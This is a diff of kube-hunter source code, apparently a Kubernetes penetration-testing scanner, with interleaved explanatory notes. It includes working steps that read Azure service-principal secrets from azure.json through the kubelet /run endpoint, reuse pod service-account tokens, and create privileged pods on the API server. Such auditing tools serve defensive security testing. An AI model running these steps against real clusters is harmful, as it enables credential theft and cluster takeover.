        self.base_url = f"https://{self.event.host}:{self.event.port}"

    # getting a container that has access to the azure.json file
    def get_key_container(self):
        logger.debug("Trying to find container with access to azure.json file")

        # pods are saved in the previous event object
        pods_data = self.event.pods

        suspicious_volume_names = []
        for pod_data in pods_data:
            for volume in pod_data["spec"].get("volumes", []):
                if volume.get("hostPath"):
                    path = volume["hostPath"]["path"]
                    if "/etc/kubernetes/azure.json".startswith(path):
                        suspicious_volume_names.append(volume["name"])
            for container in pod_data["spec"]["containers"]:
                for mount in container.get("volumeMounts", []):
                    if mount["name"] in suspicious_volume_names:
                        return {
                            "name": container["name"],
                            "pod": pod_data["metadata"]["name"],
                            "namespace": pod_data["metadata"]["namespace"],
                            "mount": mount,
                        }

    def execute(self):
        container = self.get_key_container()
        if container:
            evidence = f"pod: {container['pod']}, namespace: {container['namespace']}"
            self.publish_event(AzureSpnExposure(container=container, evidence=evidence))


@handler.subscribe(AzureSpnExposure)
class ProveAzureSpnExposure(ActiveHunter):
    """Azure SPN Hunter
    Gets the azure subscription file on the host by executing inside a container
    """

    def __init__(self, event):
        self.event = event
        self.base_url = f"https://{self.event.host}:{self.event.port}"

    def test_run_capability(self):
        """
        Uses SecureKubeletPortHunter to test the /run handler
        TODO: when multiple event subscription is implemented, use this here to make sure /run is accessible
        """
        debug_handlers = SecureKubeletPortHunter.DebugHandlers(path=self.base_url, session=self.event.session, pod=None)
        return debug_handlers.test_run_container()

    def run(self, command, container):
        config = get_config()
        run_url = f"{self.base_url}/run/{container['namespace']}/{container['pod']}/{container['name']}"
        return self.event.session.post(run_url, verify=False, params={"cmd": command}, timeout=config.network_timeout)

    def get_full_path_to_azure_file(self):
        """
        Returns a full path to /etc/kubernetes/azure.json
        Taking into consideration the difference folder of the mount inside the container.
        TODO: implement the edge case where the mount is to parent /etc folder.
        """
        azure_file_path = self.event.container["mount"]["mountPath"]

        # taking care of cases where a subPath is added to map the specific file
        if not azure_file_path.endswith("azure.json"):
            azure_file_path = os.path.join(azure_file_path, "azure.json")

        return azure_file_path

    def execute(self):
        if not self.test_run_capability():
            logger.debug("Not proving AzureSpnExposure because /run debug handler is disabled")
            return

        try:
            azure_file_path = self.get_full_path_to_azure_file()
            logger.debug(f"trying to access the azure.json at the resolved path: {azure_file_path}")
            subscription = self.run(f"cat {azure_file_path}", container=self.event.container).json()
        except requests.Timeout:
            logger.debug("failed to run command in container", exc_info=True)
        except json.decoder.JSONDecodeError:
            logger.warning("failed to parse SPN")
        else:
            if "subscriptionId" in subscription:
                self.event.subscriptionId = subscription["subscriptionId"]
                self.event.aadClientId = subscription["aadClientId"]
                self.event.aadClientSecret = subscription["aadClientSecret"]
                self.event.tenantId = subscription["tenantId"]
                self.event.evidence = f"subscription: {self.event.subscriptionId}"
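
Note the direction of the hostPath test in get_key_container above: the mount path must be a prefix of /etc/kubernetes/azure.json, so a broad mount of /etc or /etc/kubernetes is flagged too. A quick check with example paths:

target = "/etc/kubernetes/azure.json"
for path in ["/etc", "/etc/kubernetes", "/etc/kubernetes/azure.json", "/var/lib"]:
    print(path, target.startswith(path))
# -> True for the first three, False for /var/lib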
648
kube_hunter/modules/hunting/apiserver.py
Normal file
@@ -0,0 +1,648 @@
import logging
import json
import uuid
import requests

from kube_hunter.conf import get_config
from kube_hunter.modules.discovery.apiserver import ApiServer
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure
from kube_hunter.core.types import Hunter, ActiveHunter, KubernetesCluster
from kube_hunter.core.types.vulnerabilities import (
    AccessK8sApiServerTechnique,
    ExposedSensitiveInterfacesTechnique,
    GeneralDefenseEvasionTechnique,
    DataDestructionTechnique,
    ClusterAdminBindingTechnique,
    NewContainerTechnique,
    PrivilegedContainerTechnique,
    SidecarInjectionTechnique,
)

logger = logging.getLogger(__name__)


class ServerApiAccess(Vulnerability, Event):
    """The API Server port is accessible.
    Depending on your RBAC settings this could expose access to or control of your cluster."""

    def __init__(self, evidence, using_token):
        if using_token:
            name = "Access to API using service account token"
            category = AccessK8sApiServerTechnique
        else:
            name = "Unauthenticated access to API"
            category = ExposedSensitiveInterfacesTechnique
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name=name,
            category=category,
            vid="KHV005",
        )
        self.evidence = evidence


class ServerApiHTTPAccess(Vulnerability, Event):
    """The API Server port is accessible over HTTP, and therefore unencrypted.
    Depending on your RBAC settings this could expose access to or control of your cluster."""

    def __init__(self, evidence):
        name = "Insecure (HTTP) access to API"
        category = ExposedSensitiveInterfacesTechnique
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name=name,
            category=category,
            vid="KHV006",
        )
        self.evidence = evidence


class ApiInfoDisclosure(Vulnerability, Event):
    """Information Disclosure depending upon RBAC permissions and Kube-Cluster Setup"""

    def __init__(self, evidence, using_token, name):
        category = AccessK8sApiServerTechnique
        if using_token:
            name += " using default service account token"
        else:
            name += " as anonymous user"
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name=name,
            category=category,
            vid="KHV007",
        )
        self.evidence = evidence


class ListPodsAndNamespaces(ApiInfoDisclosure):
    """Accessing pods might give an attacker valuable information"""

    def __init__(self, evidence, using_token):
        ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing pods")


class ListNamespaces(ApiInfoDisclosure):
    """Accessing namespaces might give an attacker valuable information"""

    def __init__(self, evidence, using_token):
        ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing namespaces")


class ListRoles(ApiInfoDisclosure):
    """Accessing roles might give an attacker valuable information"""

    def __init__(self, evidence, using_token):
        ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing roles")


class ListClusterRoles(ApiInfoDisclosure):
    """Accessing cluster roles might give an attacker valuable information"""

    def __init__(self, evidence, using_token):
        ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing cluster roles")


class CreateANamespace(Vulnerability, Event):
    """Creating a namespace might give an attacker an area with default (exploitable) permissions to run pods in."""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Created a namespace",
            category=GeneralDefenseEvasionTechnique,
        )
        self.evidence = evidence


class DeleteANamespace(Vulnerability, Event):
    """Deleting a namespace might give an attacker the option to affect application behavior"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Delete a namespace",
            category=DataDestructionTechnique,
        )
        self.evidence = evidence


class CreateARole(Vulnerability, Event):
    """Creating a role might give an attacker the option to harm the normal behavior of newly created pods
    within the specified namespaces.
    """

    def __init__(self, evidence):
        Vulnerability.__init__(self, KubernetesCluster, name="Created a role", category=GeneralDefenseEvasionTechnique)
        self.evidence = evidence


class CreateAClusterRole(Vulnerability, Event):
    """Creating a cluster role might give an attacker the option to harm the normal behavior of newly created pods
    across the whole cluster
    """

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Created a cluster role",
            category=ClusterAdminBindingTechnique,
        )
        self.evidence = evidence


class PatchARole(Vulnerability, Event):
    """Patching a role might give an attacker the option to create new pods with custom roles within the
    specific role's namespace scope
    """

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Patched a role",
            category=ClusterAdminBindingTechnique,
        )
        self.evidence = evidence


class PatchAClusterRole(Vulnerability, Event):
    """Patching a cluster role might give an attacker the option to create new pods with custom roles within the whole
    cluster scope.
    """

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Patched a cluster role",
            category=ClusterAdminBindingTechnique,
        )
        self.evidence = evidence


class DeleteARole(Vulnerability, Event):
    """Deleting a role might allow an attacker to affect access to resources in the namespace"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Deleted a role",
            category=DataDestructionTechnique,
        )
        self.evidence = evidence


class DeleteAClusterRole(Vulnerability, Event):
    """Deleting a cluster role might allow an attacker to affect access to resources in the cluster"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Deleted a cluster role",
            category=DataDestructionTechnique,
        )
        self.evidence = evidence


class CreateAPod(Vulnerability, Event):
    """Creating a new pod allows an attacker to run custom code"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Created A Pod",
            category=NewContainerTechnique,
        )
        self.evidence = evidence


class CreateAPrivilegedPod(Vulnerability, Event):
    """Creating a new PRIVILEGED pod would gain an attacker FULL CONTROL over the cluster"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Created A PRIVILEGED Pod",
            category=PrivilegedContainerTechnique,
        )
        self.evidence = evidence


class PatchAPod(Vulnerability, Event):
    """Patching a pod allows an attacker to compromise and control it"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Patched A Pod",
            category=SidecarInjectionTechnique,
        )
        self.evidence = evidence


class DeleteAPod(Vulnerability, Event):
    """Deleting a pod allows an attacker to disturb applications on the cluster"""

    def __init__(self, evidence):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="Deleted A Pod",
            category=DataDestructionTechnique,
        )
        self.evidence = evidence


class ApiServerPassiveHunterFinished(Event):
    def __init__(self, namespaces):
        self.namespaces = namespaces


# This Hunter checks what happens if we try to access the API Server without a service account token
# If we have a service account token we'll also trigger AccessApiServerWithToken below
@handler.subscribe(ApiServer)
class AccessApiServer(Hunter):
    """API Server Hunter
    Checks if API server is accessible
    """

    def __init__(self, event):
        self.event = event
        self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
        self.headers = {}
        self.with_token = False

    def access_api_server(self):
        config = get_config()
        logger.debug(f"Passive Hunter is attempting to access the API at {self.path}")
        try:
            r = requests.get(f"{self.path}/api", headers=self.headers, verify=False, timeout=config.network_timeout)
            if r.status_code == 200 and r.content:
                return r.content
        except requests.exceptions.ConnectionError:
            pass
        return False

    def get_items(self, path):
        config = get_config()
        try:
            items = []
            r = requests.get(path, headers=self.headers, verify=False, timeout=config.network_timeout)
            if r.status_code == 200:
                resp = json.loads(r.content)
                for item in resp["items"]:
                    items.append(item["metadata"]["name"])
                return items
            logger.debug(f"Got HTTP {r.status_code} response: {r.text}")
        except (requests.exceptions.ConnectionError, KeyError):
            logger.debug(f"Failed retrieving items from API server at {path}")

        return None

    def get_pods(self, namespace=None):
        config = get_config()
        pods = []
        try:
            if not namespace:
                r = requests.get(
                    f"{self.path}/api/v1/pods",
                    headers=self.headers,
                    verify=False,
                    timeout=config.network_timeout,
                )
            else:
                r = requests.get(
                    f"{self.path}/api/v1/namespaces/{namespace}/pods",
                    headers=self.headers,
                    verify=False,
                    timeout=config.network_timeout,
                )
            if r.status_code == 200:
                resp = json.loads(r.content)
                for item in resp["items"]:
                    name = item["metadata"]["name"].encode("ascii", "ignore")
                    namespace = item["metadata"]["namespace"].encode("ascii", "ignore")
                    pods.append({"name": name, "namespace": namespace})
                return pods
        except (requests.exceptions.ConnectionError, KeyError):
            pass
        return None

    def execute(self):
        api = self.access_api_server()
        if api:
            if self.event.protocol == "http":
                self.publish_event(ServerApiHTTPAccess(api))
            else:
                self.publish_event(ServerApiAccess(api, self.with_token))

        namespaces = self.get_items(f"{self.path}/api/v1/namespaces")
        if namespaces:
            self.publish_event(ListNamespaces(namespaces, self.with_token))

        roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/roles")
        if roles:
            self.publish_event(ListRoles(roles, self.with_token))

        cluster_roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles")
        if cluster_roles:
            self.publish_event(ListClusterRoles(cluster_roles, self.with_token))

        pods = self.get_pods()
        if pods:
            self.publish_event(ListPodsAndNamespaces(pods, self.with_token))

        # If we have a service account token, this event should get triggered twice - once with and once without
        # the token
        self.publish_event(ApiServerPassiveHunterFinished(namespaces))


@handler.subscribe(ApiServer, predicate=lambda x: x.auth_token)
class AccessApiServerWithToken(AccessApiServer):
    """API Server Hunter
    Accessing the API server using the service account token obtained from a compromised pod
    """

    def __init__(self, event):
        super().__init__(event)
        assert self.event.auth_token
        self.headers = {"Authorization": f"Bearer {self.event.auth_token}"}
        self.category = AccessK8sApiServerTechnique
        self.with_token = True


# Active Hunter
@handler.subscribe(ApiServerPassiveHunterFinished)
class AccessApiServerActive(ActiveHunter):
    """API server hunter
    Accessing the api server might grant an attacker full control over the cluster
    """

    def __init__(self, event):
        self.event = event
        self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"

    def create_item(self, path, data):
        config = get_config()
        headers = {"Content-Type": "application/json"}
        if self.event.auth_token:
            headers["Authorization"] = f"Bearer {self.event.auth_token}"

        try:
            res = requests.post(path, verify=False, data=data, headers=headers, timeout=config.network_timeout)
            if res.status_code in [200, 201, 202]:
                parsed_content = json.loads(res.content)
                return parsed_content["metadata"]["name"]
        except (requests.exceptions.ConnectionError, KeyError):
            pass
        return None

    def patch_item(self, path, data):
        config = get_config()
        headers = {"Content-Type": "application/json-patch+json"}
        if self.event.auth_token:
            headers["Authorization"] = f"Bearer {self.event.auth_token}"
        try:
            res = requests.patch(path, headers=headers, verify=False, data=data, timeout=config.network_timeout)
            if res.status_code not in [200, 201, 202]:
                return None
            parsed_content = json.loads(res.content)
            # TODO is there a patch timestamp we could use?
            return parsed_content["metadata"]["namespace"]
        except (requests.exceptions.ConnectionError, KeyError):
            pass
        return None

    def delete_item(self, path):
        config = get_config()
        headers = {}
        if self.event.auth_token:
            headers["Authorization"] = f"Bearer {self.event.auth_token}"
        try:
            res = requests.delete(path, headers=headers, verify=False, timeout=config.network_timeout)
            if res.status_code in [200, 201, 202]:
                parsed_content = json.loads(res.content)
                return parsed_content["metadata"]["deletionTimestamp"]
        except (requests.exceptions.ConnectionError, KeyError):
            pass
        return None

    def create_a_pod(self, namespace, is_privileged):
        privileged_value = {"securityContext": {"privileged": True}} if is_privileged else {}
        random_name = str(uuid.uuid4())[0:5]
        pod = {
            "apiVersion": "v1",
            "kind": "Pod",
            "metadata": {"name": random_name},
            "spec": {
                "containers": [
                    {"name": random_name, "image": "nginx:1.7.9", "ports": [{"containerPort": 80}], **privileged_value}
                ]
            },
        }
        return self.create_item(path=f"{self.path}/api/v1/namespaces/{namespace}/pods", data=json.dumps(pod))

    def delete_a_pod(self, namespace, pod_name):
        delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}")
        if not delete_timestamp:
            logger.error(f"Created pod {pod_name} in namespace {namespace} but unable to delete it")
        return delete_timestamp

    def patch_a_pod(self, namespace, pod_name):
        data = [{"op": "add", "path": "/hello", "value": ["world"]}]
        return self.patch_item(
            path=f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}",
            data=json.dumps(data),
        )

    def create_namespace(self):
        random_name = (str(uuid.uuid4()))[0:5]
        data = {
            "kind": "Namespace",
            "apiVersion": "v1",
            "metadata": {"name": random_name, "labels": {"name": random_name}},
        }
        return self.create_item(path=f"{self.path}/api/v1/namespaces", data=json.dumps(data))

    def delete_namespace(self, namespace):
|
||||
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}")
|
||||
if delete_timestamp is None:
|
||||
logger.error(f"Created namespace {namespace} but failed to delete it")
|
||||
return delete_timestamp
|
||||
|
||||
def create_a_role(self, namespace):
|
||||
name = str(uuid.uuid4())[0:5]
|
||||
role = {
|
||||
"kind": "Role",
|
||||
"apiVersion": "rbac.authorization.k8s.io/v1",
|
||||
"metadata": {"namespace": namespace, "name": name},
|
||||
"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
|
||||
}
|
||||
return self.create_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles",
|
||||
data=json.dumps(role),
|
||||
)
|
||||
|
||||
def create_a_cluster_role(self):
|
||||
name = str(uuid.uuid4())[0:5]
|
||||
cluster_role = {
|
||||
"kind": "ClusterRole",
|
||||
"apiVersion": "rbac.authorization.k8s.io/v1",
|
||||
"metadata": {"name": name},
|
||||
"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
|
||||
}
|
||||
return self.create_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles",
|
||||
data=json.dumps(cluster_role),
|
||||
)
|
||||
|
||||
def delete_a_role(self, namespace, name):
|
||||
delete_timestamp = self.delete_item(
|
||||
f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles/{name}"
|
||||
)
|
||||
if delete_timestamp is None:
|
||||
logger.error(f"Created role {name} in namespace {namespace} but unable to delete it")
|
||||
return delete_timestamp
|
||||
|
||||
def delete_a_cluster_role(self, name):
|
||||
delete_timestamp = self.delete_item(f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{name}")
|
||||
if delete_timestamp is None:
|
||||
logger.error(f"Created cluster role {name} but unable to delete it")
|
||||
return delete_timestamp
|
||||
|
||||
def patch_a_role(self, namespace, role):
|
||||
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
|
||||
return self.patch_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles/{role}",
|
||||
data=json.dumps(data),
|
||||
)
|
||||
|
||||
def patch_a_cluster_role(self, cluster_role):
|
||||
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
|
||||
return self.patch_item(
|
||||
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{cluster_role}",
|
||||
data=json.dumps(data),
|
||||
)
|
||||
|
||||
def execute(self):
|
||||
# Try creating cluster-wide objects
|
||||
namespace = self.create_namespace()
|
||||
if namespace:
|
||||
self.publish_event(CreateANamespace(f"new namespace name: {namespace}"))
|
||||
delete_timestamp = self.delete_namespace(namespace)
|
||||
if delete_timestamp:
|
||||
self.publish_event(DeleteANamespace(delete_timestamp))
|
||||
|
||||
cluster_role = self.create_a_cluster_role()
|
||||
if cluster_role:
|
||||
self.publish_event(CreateAClusterRole(f"Cluster role name: {cluster_role}"))
|
||||
|
||||
patch_evidence = self.patch_a_cluster_role(cluster_role)
|
||||
if patch_evidence:
|
||||
self.publish_event(
|
||||
PatchAClusterRole(f"Patched Cluster Role Name: {cluster_role} Patch evidence: {patch_evidence}")
|
||||
)
|
||||
|
||||
delete_timestamp = self.delete_a_cluster_role(cluster_role)
|
||||
if delete_timestamp:
|
||||
self.publish_event(DeleteAClusterRole(f"Cluster role {cluster_role} deletion time {delete_timestamp}"))
|
||||
|
||||
# Try attacking all the namespaces we know about
|
||||
if self.event.namespaces:
|
||||
for namespace in self.event.namespaces:
|
||||
# Try creating and deleting a privileged pod
|
||||
pod_name = self.create_a_pod(namespace, True)
|
||||
if pod_name:
|
||||
self.publish_event(CreateAPrivilegedPod(f"Pod Name: {pod_name} Namespace: {namespace}"))
|
||||
delete_time = self.delete_a_pod(namespace, pod_name)
|
||||
if delete_time:
|
||||
self.publish_event(DeleteAPod(f"Pod Name: {pod_name} Deletion time: {delete_time}"))
|
||||
|
||||
# Try creating, patching and deleting an unprivileged pod
|
||||
pod_name = self.create_a_pod(namespace, False)
|
||||
if pod_name:
|
||||
self.publish_event(CreateAPod(f"Pod Name: {pod_name} Namespace: {namespace}"))
|
||||
|
||||
patch_evidence = self.patch_a_pod(namespace, pod_name)
|
||||
if patch_evidence:
|
||||
self.publish_event(
|
||||
PatchAPod(
|
||||
f"Pod Name: {pod_name} " f"Namespace: {namespace} " f"Patch evidence: {patch_evidence}"
|
||||
)
|
||||
)
|
||||
|
||||
delete_time = self.delete_a_pod(namespace, pod_name)
|
||||
if delete_time:
|
||||
self.publish_event(
|
||||
DeleteAPod(
|
||||
f"Pod Name: {pod_name} " f"Namespace: {namespace} " f"Delete time: {delete_time}"
|
||||
)
|
||||
)
|
||||
|
||||
role = self.create_a_role(namespace)
|
||||
if role:
|
||||
self.publish_event(CreateARole(f"Role name: {role}"))
|
||||
|
||||
patch_evidence = self.patch_a_role(namespace, role)
|
||||
if patch_evidence:
|
||||
self.publish_event(
|
||||
PatchARole(
|
||||
f"Patched Role Name: {role} "
|
||||
f"Namespace: {namespace} "
|
||||
f"Patch evidence: {patch_evidence}"
|
||||
)
|
||||
)
|
||||
|
||||
delete_time = self.delete_a_role(namespace, role)
|
||||
if delete_time:
|
||||
self.publish_event(
|
||||
DeleteARole(
|
||||
f"Deleted role: {role} " f"Namespace: {namespace} " f"Delete time: {delete_time}"
|
||||
)
|
||||
)
|
||||
|
||||
# Note: we are not binding any role or cluster role because
|
||||
# in certain cases it might effect the running pod within the cluster (and we don't want to do that).
|
||||
|
||||
|
||||
@handler.subscribe(ApiServer)
|
||||
class ApiVersionHunter(Hunter):
|
||||
"""Api Version Hunter
|
||||
Tries to obtain the Api Server's version directly from /version endpoint
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
|
||||
self.session = requests.Session()
|
||||
self.session.verify = False
|
||||
if self.event.auth_token:
|
||||
self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
|
||||
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
if self.event.auth_token:
|
||||
logger.debug(
|
||||
"Trying to access the API server version endpoint using pod's"
|
||||
f" service account token on {self.event.host}:{self.event.port} \t"
|
||||
)
|
||||
else:
|
||||
logger.debug("Trying to access the API server version endpoint anonymously")
|
||||
version = self.session.get(f"{self.path}/version", timeout=config.network_timeout).json()["gitVersion"]
|
||||
logger.debug(f"Discovered version of api server {version}")
|
||||
self.publish_event(K8sVersionDisclosure(version=version, from_endpoint="/version"))
|
||||
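The request pattern above is easiest to see end to end in isolation. The following standalone sketch is not kube-hunter code; the in-cluster API address, token path, and timeout are the usual defaults, assumed here. It reproduces what AccessApiServerWithToken does: read the pod's mounted service-account token and list namespaces with it.

import requests

TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"

def list_namespaces(api="https://kubernetes.default.svc"):
    # read the token the kubelet mounts into every (default) pod
    with open(TOKEN_PATH) as f:
        token = f.read()
    r = requests.get(
        f"{api}/api/v1/namespaces",
        headers={"Authorization": f"Bearer {token}"},
        verify=False,  # kube-hunter also skips TLS verification for these probes
        timeout=3,
    )
    if r.status_code != 200:
        return None
    return [item["metadata"]["name"] for item in r.json()["items"]]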
kube_hunter/modules/hunting/capabilities.py (new file, 49 lines)
@@ -0,0 +1,49 @@
import socket
import logging

from kube_hunter.modules.discovery.hosts import RunningAsPodEvent
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import Hunter, ARPPoisoningTechnique, KubernetesCluster

logger = logging.getLogger(__name__)


class CapNetRawEnabled(Event, Vulnerability):
    """CAP_NET_RAW is enabled by default for pods.
    If an attacker manages to compromise a pod,
    they could potentially take advantage of this capability to perform network
    attacks on other pods running on the same node"""

    def __init__(self):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            name="CAP_NET_RAW Enabled",
            category=ARPPoisoningTechnique,
        )


@handler.subscribe(RunningAsPodEvent)
class PodCapabilitiesHunter(Hunter):
    """Pod Capabilities Hunter
    Checks for default enabled capabilities in a pod
    """

    def __init__(self, event):
        self.event = event

    def check_net_raw(self):
        logger.debug("Passive hunter is trying to open a RAW socket")
        try:
            # trying to open a raw socket without CAP_NET_RAW will raise PermissionError
            s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
            s.close()
            logger.debug("Passive hunter is closing the RAW socket")
            return True
        except PermissionError:
            logger.debug("CAP_NET_RAW not enabled")

    def execute(self):
        if self.check_net_raw():
            self.publish_event(CapNetRawEnabled())
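For comparison, the same check can be done without touching the network stack at all. This is a sketch, not part of the module: it reads the effective capability bitmask from /proc/self/status. CAP_NET_RAW is capability number 13 on Linux.

def has_cap_net_raw(status_path="/proc/self/status"):
    # CapEff holds the effective capability set as a hex bitmask
    with open(status_path) as f:
        for line in f:
            if line.startswith("CapEff:"):
                return bool(int(line.split()[1], 16) & (1 << 13))
    return False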
kube_hunter/modules/hunting/certificates.py (new file, 55 lines)
@@ -0,0 +1,55 @@
import ssl
import logging
import base64
import re

from kube_hunter.core.types import Hunter, KubernetesCluster, GeneralSensitiveInformationTechnique
from kube_hunter.core.events.event_handler import handler
from kube_hunter.core.events.types import Vulnerability, Event, Service

logger = logging.getLogger(__name__)
email_pattern = re.compile(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")


class CertificateEmail(Vulnerability, Event):
    """The Kubernetes API Server advertises a public certificate for TLS.
    This certificate includes an email address that may give an attacker additional information about your
    organization, or be abused for further email-based attacks."""

    def __init__(self, email):
        Vulnerability.__init__(
            self,
            KubernetesCluster,
            "Certificate Includes Email Address",
            category=GeneralSensitiveInformationTechnique,
            vid="KHV021",
        )
        self.email = email
        self.evidence = f"email: {self.email}"


@handler.subscribe(Service)
class CertificateDiscovery(Hunter):
    """Certificate Email Hunting
    Checks for email addresses in Kubernetes SSL certificates
    """

    def __init__(self, event):
        self.event = event

    def execute(self):
        try:
            logger.debug("Passive hunter is attempting to get the server certificate")
            addr = (str(self.event.host), self.event.port)
            cert = ssl.get_server_certificate(addr)
        except ssl.SSLError:
            # If the server doesn't offer SSL on this port we won't get a certificate
            return
        self.examine_certificate(cert)

    def examine_certificate(self, cert):
        # remove the PEM header/footer markers, then decode the base64 body
        # (str.strip(ssl.PEM_HEADER) would strip *characters*, not the marker)
        c = cert.replace(ssl.PEM_HEADER, "").replace(ssl.PEM_FOOTER, "").strip()
        certdata = base64.b64decode(c)
        emails = re.findall(email_pattern, certdata)
        for email in emails:
            self.publish_event(CertificateEmail(email=email))
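The same check is easy to reproduce interactively. A standard-library-only sketch (the host and port are placeholders) that mirrors what CertificateDiscovery does: fetch the serving certificate and grep the raw DER bytes for email addresses.

import base64
import re
import ssl

pem = ssl.get_server_certificate(("10.0.0.1", 6443))  # placeholder API server address
der = base64.b64decode(pem.replace(ssl.PEM_HEADER, "").replace(ssl.PEM_FOOTER, ""))
print(re.findall(rb"[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+", der))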
@@ -1,117 +1,183 @@
 import logging
-import json
-import requests
-
-from __main__ import config
-
-from ...core.events import handler
-from ...core.events.types import Vulnerability, Event, K8sVersionDisclosure
-from ...core.types import Hunter, ActiveHunter, KubernetesCluster, RemoteCodeExec, AccessRisk, InformationDisclosure, \
-    PrivilegeEscalation, DenialOfService, KubectlClient
-from ..discovery.kubectl import KubectlClientEvent
 
 from packaging import version
 
-""" Cluster CVES """
+from kube_hunter.conf import get_config
+from kube_hunter.core.events.event_handler import handler
+from kube_hunter.core.events.types import K8sVersionDisclosure, Vulnerability, Event
+from kube_hunter.core.types import (
+    Hunter,
+    KubectlClient,
+    KubernetesCluster,
+    CVERemoteCodeExecutionCategory,
+    CVEPrivilegeEscalationCategory,
+    CVEDenialOfServiceTechnique,
+)
+from kube_hunter.modules.discovery.kubectl import KubectlClientEvent
+
+logger = logging.getLogger(__name__)
+config = get_config()
 
 
 class ServerApiVersionEndPointAccessPE(Vulnerability, Event):
     """Node is vulnerable to critical CVE-2018-1002105"""
 
     def __init__(self, evidence):
-        Vulnerability.__init__(self, KubernetesCluster, name="Critical Privilege Escalation CVE", category=PrivilegeEscalation, vid="KHV022")
+        Vulnerability.__init__(
+            self,
+            KubernetesCluster,
+            name="Critical Privilege Escalation CVE",
+            category=CVEPrivilegeEscalationCategory,
+            vid="KHV022",
+        )
         self.evidence = evidence
 
 
 class ServerApiVersionEndPointAccessDos(Vulnerability, Event):
-    """Node not patched for CVE-2019-1002100. Depending on your RBAC settings, a crafted json-patch could cause a Denial of Service."""
+    """Node not patched for CVE-2019-1002100. Depending on your RBAC settings,
+    a crafted json-patch could cause a Denial of Service."""
 
     def __init__(self, evidence):
-        Vulnerability.__init__(self, KubernetesCluster, name="Denial of Service to Kubernetes API Server", category=DenialOfService, vid="KHV023")
+        Vulnerability.__init__(
+            self,
+            KubernetesCluster,
+            name="Denial of Service to Kubernetes API Server",
+            category=CVEDenialOfServiceTechnique,
+            vid="KHV023",
+        )
         self.evidence = evidence
 
 
 class PingFloodHttp2Implementation(Vulnerability, Event):
-    """Node not patched for CVE-2019-9512. An attacker could cause a Denial of Service by sending specially crafted HTTP requests."""
+    """Node not patched for CVE-2019-9512. An attacker could cause a
+    Denial of Service by sending specially crafted HTTP requests."""
 
     def __init__(self, evidence):
-        Vulnerability.__init__(self, KubernetesCluster, name="Possible Ping Flood Attack", category=DenialOfService, vid="KHV024")
+        Vulnerability.__init__(
+            self,
+            KubernetesCluster,
+            name="Possible Ping Flood Attack",
+            category=CVEDenialOfServiceTechnique,
+            vid="KHV024",
+        )
         self.evidence = evidence
 
 
 class ResetFloodHttp2Implementation(Vulnerability, Event):
-    """Node not patched for CVE-2019-9514. An attacker could cause a Denial of Service by sending specially crafted HTTP requests."""
+    """Node not patched for CVE-2019-9514. An attacker could cause a
+    Denial of Service by sending specially crafted HTTP requests."""
 
     def __init__(self, evidence):
-        Vulnerability.__init__(self, KubernetesCluster, name="Possible Reset Flood Attack", category=DenialOfService, vid="KHV025")
+        Vulnerability.__init__(
+            self,
+            KubernetesCluster,
+            name="Possible Reset Flood Attack",
+            category=CVEDenialOfServiceTechnique,
+            vid="KHV025",
+        )
         self.evidence = evidence
 
 
 class ServerApiClusterScopedResourcesAccess(Vulnerability, Event):
-    """Api Server not patched for CVE-2019-11247. API server allows access to custom resources via wrong scope"""
+    """Api Server not patched for CVE-2019-11247.
+    API server allows access to custom resources via wrong scope"""
 
